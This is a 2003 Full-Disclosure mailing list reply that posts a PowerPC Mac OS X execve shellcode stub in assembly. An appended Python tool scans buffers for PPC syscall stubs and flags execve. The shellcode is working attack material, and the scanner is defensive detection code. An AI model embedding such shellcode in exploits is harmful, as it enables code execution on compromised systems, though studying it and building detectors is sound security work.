Re: [Full-Disclosure] PPC OSX Shellcode ASM

From: Andrew Pinski (pinskia_at_physics.uc.edu)
Date: 09/01/03

    To: B-r00t <br00t@blueyonder.co.uk>
    Date: Mon, 1 Sep 2003 08:34:22 -0700

    The original code for execve can be improved on, yes it is the same
    size (but faster for 970):
    _main:
            bcl 20,31,"L00000000001$pb" ; fast way of not flushing the lr link stack
    "L00000000001$pb":
            mflr r3 ; r3 = main+8
            xor r5,r5,r5 ; r5 = 0
            addi r3, r3, lo16(string) ; r3 = string
            stw r3, -8(r1) ; argv[0] = string
            stw r5, -4(r1) ; argv[1] = NULL
            subi r4, r1, 8 ; r4 = pointer to argv[]
            li r0, 59 ; r0 = 59 execve()
            sc ; execve(r3, r4, r5)

    Thanks,
    Andrew Pinski

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
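The sequence above ends the way every Darwin/PPC syscall stub does: load the syscall number into r0 with `li`, then execute `sc`. That fixed shape is what a defender can key on when scanning an untrusted buffer for embedded PowerPC syscall stubs. The following Python is an added example written for this post, not code from the thread: it decodes big-endian PPC32 words, finds every `sc` (encoding 0x44000002) at any byte alignment, walks back a few instructions for the `li r0, N` that set the syscall number, and labels 59 as execve as the post states. The sample buffer is constructed here and only contains the `li r0, 59` / `sc` pair padded with `nop` (ori 0,0,0) and two junk bytes to show unaligned matching; the `window` size and the name table entries other than 59 are assumptions.

```python
import struct

SC_ENCODING = 0x44000002          # PowerPC "sc" (system call), fixed 32-bit encoding
NOP_ENCODING = 0x60000000         # "ori 0,0,0", the canonical PPC nop, used as filler only

# 59 = execve is stated in the post (Darwin/BSD numbering); 1 = exit is an
# assumed extra entry from the BSD table for illustration.
SYSCALL_NAMES = {59: "execve", 1: "exit"}


def decode_li_r0(word):
    """Return the sign-extended immediate if `word` is `li r0, imm`
    (i.e. addi rT=0, rA=0, simm), otherwise None."""
    opcode = word >> 26
    rt = (word >> 21) & 0x1F
    ra = (word >> 16) & 0x1F
    if opcode == 14 and rt == 0 and ra == 0:
        imm = word & 0xFFFF
        return imm - 0x10000 if imm & 0x8000 else imm
    return None


def find_syscalls(blob, window=8):
    """Scan `blob` at every byte offset for an `sc` word. For each hit, look
    back up to `window` 4-byte words for the `li r0, N` that loaded the
    syscall number. Returns a list of (offset_of_sc, syscall_number_or_None)."""
    hits = []
    for off in range(0, len(blob) - 3):
        if struct.unpack_from(">I", blob, off)[0] != SC_ENCODING:
            continue
        number = None
        back = off - 4
        for _ in range(window):
            if back < 0:
                break
            number = decode_li_r0(struct.unpack_from(">I", blob, back)[0])
            if number is not None:
                break
            back -= 4
        hits.append((off, number))
    return hits


def label_syscalls(blob, window=8):
    """Same as find_syscalls, with the syscall number mapped to a name where known."""
    return [(off, num, SYSCALL_NAMES.get(num, "unknown"))
            for off, num in find_syscalls(blob, window)]


# Constructed sample: 2 junk bytes, li r0,59 (0x3800003B), nop, sc, nop.
# The junk bytes leave the instructions unaligned relative to the buffer start.
SAMPLE = (b"\x00\x00"
          + struct.pack(">I", 0x3800003B)
          + struct.pack(">I", NOP_ENCODING)
          + struct.pack(">I", SC_ENCODING)
          + struct.pack(">I", NOP_ENCODING))

if __name__ == "__main__":
    for off, num, name in label_syscalls(SAMPLE):
        print(f"sc at offset {off}: r0 = {num} ({name})")
```

A real scanner would also want the little-endian form if the target is not big-endian and would treat a hit with `number is None` as "syscall number set some other way", which is itself worth flagging rather than discarding.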
